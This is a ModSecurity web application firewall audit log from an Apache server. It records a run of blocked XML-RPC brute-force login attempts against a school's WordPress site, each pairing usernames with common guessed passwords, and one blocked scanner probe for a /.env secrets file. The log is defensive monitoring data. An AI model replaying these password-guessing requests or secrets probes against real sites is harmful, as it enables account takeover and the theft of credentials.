[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071026323568 5262 (- - -) Stopwatch2: 1745071026323568 5262; combined=3911, p1=481, p2=3256, p3=0, p4=0, p5=102, sr=91, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5624b760-Z-- --fd0ff612-A-- [19/Apr/2025:20:58:07 +0700] aAOr70ruoUXZj665VUHz0gAAANg 103.236.140.4 45896 103.236.140.4 8181 --fd0ff612-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --fd0ff612-C-- wp.getUsersBlogs wakakur hunter --fd0ff612-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd0ff612-E-- --fd0ff612-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071087483096 5628 (- - -) Stopwatch2: 1745071087483096 5628; combined=3980, p1=510, p2=3259, p3=0, p4=0, p5=137, sr=88, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd0ff612-Z-- --6e40ba1c-A-- [19/Apr/2025:20:59:07 +0700] aAOsK-vDiFC_ir7MDwbi7wAAAE4 103.236.140.4 46226 103.236.140.4 8181 --6e40ba1c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6e40ba1c-C-- wp.getUsersBlogs wakakur Chegg123 --6e40ba1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e40ba1c-E-- --6e40ba1c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (51+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071147347581 5125 (- - -) Stopwatch2: 1745071147347581 5125; combined=3781, p1=461, p2=3151, p3=0, p4=0, p5=99, sr=87, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e40ba1c-Z-- --33e7db45-A-- [19/Apr/2025:21:00:07 +0700] aAOsZ0ruoUXZj665VUH0IQAAAMI 103.236.140.4 46496 103.236.140.4 8181 --33e7db45-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --33e7db45-C-- wp.getUsersBlogs wakakur hockey --33e7db45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33e7db45-E-- --33e7db45-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071207265128 5383 (- - -) Stopwatch2: 1745071207265128 5383; combined=3849, p1=492, p2=3187, p3=0, p4=0, p5=100, sr=87, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33e7db45-Z-- --547e3e62-A-- [19/Apr/2025:21:01:09 +0700] aAOspQ6cTFSgLAHl7PrVnwAAAAs 103.236.140.4 46804 103.236.140.4 8181 --547e3e62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --547e3e62-C-- wp.getUsersBlogs wakakur evite --547e3e62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --547e3e62-E-- --547e3e62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071269907222 5868 (- - -) Stopwatch2: 1745071269907222 5868; combined=4081, p1=496, p2=3412, p3=0, p4=0, p5=102, sr=98, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --547e3e62-Z-- --f063855a-A-- [19/Apr/2025:21:02:09 +0700] aAOs4XNa4dA2HllpK_N57gAAAJE 103.236.140.4 47082 103.236.140.4 8181 --f063855a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f063855a-C-- wp.getUsersBlogs wakahumas wakahumas --f063855a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f063855a-E-- --f063855a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (20+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071329086680 4730 (- - -) Stopwatch2: 1745071329086680 4730; combined=3326, p1=406, p2=2772, p3=0, p4=0, p5=88, sr=77, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f063855a-Z-- --48c5446a-A-- [19/Apr/2025:21:03:11 +0700] aAOtH-vDiFC_ir7MDwbjYAAAAFg 103.236.140.4 47366 103.236.140.4 8181 --48c5446a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --48c5446a-C-- wp.getUsersBlogs wakahumas admin_lin --48c5446a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48c5446a-E-- --48c5446a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071391889194 5476 (- - -) Stopwatch2: 1745071391889194 5476; combined=3937, p1=445, p2=3201, p3=0, p4=0, p5=188, sr=86, sw=103, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48c5446a-Z-- --9f205970-A-- [19/Apr/2025:21:04:13 +0700] aAOtXQ6cTFSgLAHl7PrV3AAAABE 103.236.140.4 47644 103.236.140.4 8181 --9f205970-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9f205970-C-- wp.getUsersBlogs wakahumas Admin123 --9f205970-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f205970-E-- --9f205970-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071453845767 5334 (- - -) Stopwatch2: 1745071453845767 5334; combined=3812, p1=462, p2=3172, p3=0, p4=0, p5=106, sr=87, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f205970-Z-- --f687fe75-A-- [19/Apr/2025:21:05:14 +0700] aAOtmuvDiFC_ir7MDwbjpQAAAEo 103.236.140.4 47940 103.236.140.4 8181 --f687fe75-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 233 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f687fe75-C-- wp.getUsersBlogs wakahumas wordPress15839Drop --f687fe75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f687fe75-E-- --f687fe75-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071514639001 5508 (- - -) Stopwatch2: 1745071514639001 5508; combined=3965, p1=490, p2=3255, p3=0, p4=0, p5=125, sr=127, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f687fe75-Z-- --13a2583a-A-- [19/Apr/2025:21:06:18 +0700] aAOt2g6cTFSgLAHl7PrWAgAAABg 103.236.140.4 48264 103.236.140.4 8181 --13a2583a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --13a2583a-C-- wp.getUsersBlogs wakahumas 1111111 --13a2583a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13a2583a-E-- --13a2583a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071578274537 4964 (- - -) Stopwatch2: 1745071578274537 4964; combined=3864, p1=423, p2=3206, p3=0, p4=0, p5=137, sr=78, sw=98, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13a2583a-Z-- --ec22c600-A-- [19/Apr/2025:21:07:26 +0700] aAOuHuvDiFC_ir7MDwbjuwAAAFA 103.236.140.4 48574 103.236.140.4 8181 --ec22c600-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ec22c600-C-- wp.getUsersBlogs wakahumas wakahumas1980 --ec22c600-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec22c600-E-- --ec22c600-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071646312381 4967 (- - -) Stopwatch2: 1745071646312381 4967; combined=3824, p1=437, p2=3218, p3=0, p4=0, p5=100, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec22c600-Z-- --f896c86f-A-- [19/Apr/2025:21:08:26 +0700] aAOuWg6cTFSgLAHl7PrWawAAABc 103.236.140.4 48914 103.236.140.4 8181 --f896c86f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f896c86f-C-- wp.getUsersBlogs wakahumas qazwsxedc --f896c86f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f896c86f-E-- --f896c86f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071706430054 4222 (- - -) Stopwatch2: 1745071706430054 4222; combined=3248, p1=371, p2=2701, p3=0, p4=0, p5=102, sr=97, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f896c86f-Z-- --22fc3c71-A-- [19/Apr/2025:21:09:31 +0700] aAOumw6cTFSgLAHl7PrWlQAAAAs 103.236.140.4 49224 103.236.140.4 8181 --22fc3c71-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --22fc3c71-C-- wp.getUsersBlogs wakahumas shaggy --22fc3c71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22fc3c71-E-- --22fc3c71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071771611255 5366 (- - -) Stopwatch2: 1745071771611255 5366; combined=3909, p1=508, p2=3231, p3=0, p4=0, p5=100, sr=92, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22fc3c71-Z-- --de488737-A-- [19/Apr/2025:21:10:33 +0700] aAOu2XNa4dA2HllpK_N6cQAAAJE 103.236.140.4 49496 103.236.140.4 8181 --de488737-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --de488737-C-- wp.getUsersBlogs wakahumas monkey1 --de488737-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de488737-E-- --de488737-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (15+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071833303590 5233 (- - -) Stopwatch2: 1745071833303590 5233; combined=4130, p1=496, p2=3462, p3=0, p4=0, p5=103, sr=87, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de488737-Z-- --ca99af43-A-- [19/Apr/2025:21:11:07 +0700] aAOu-0ruoUXZj665VUH08AAAANI 103.236.140.4 49642 103.236.140.4 8181 --ca99af43-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.223.62.250 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.223.62.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --ca99af43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca99af43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745071867865631 655 (- - -) Stopwatch2: 1745071867865631 655; combined=267, p1=233, p2=0, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca99af43-Z-- --7c73b932-A-- [19/Apr/2025:21:11:35 +0700] aAOvF0ruoUXZj665VUH09wAAAMQ 103.236.140.4 49756 103.236.140.4 8181 --7c73b932-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7c73b932-C-- wp.getUsersBlogs wakahumas Marketing2023 --7c73b932-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c73b932-E-- --7c73b932-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (13+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071895564188 5183 (- - -) Stopwatch2: 1745071895564188 5183; combined=3684, p1=446, p2=3068, p3=0, p4=0, p5=100, sr=79, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c73b932-Z-- --6fdafd16-A-- [19/Apr/2025:21:12:35 +0700] aAOvUw6cTFSgLAHl7PrW1wAAAAY 103.236.140.4 50068 103.236.140.4 8181 --6fdafd16-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6fdafd16-C-- wp.getUsersBlogs wakahumas 212121 --6fdafd16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fdafd16-E-- --6fdafd16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
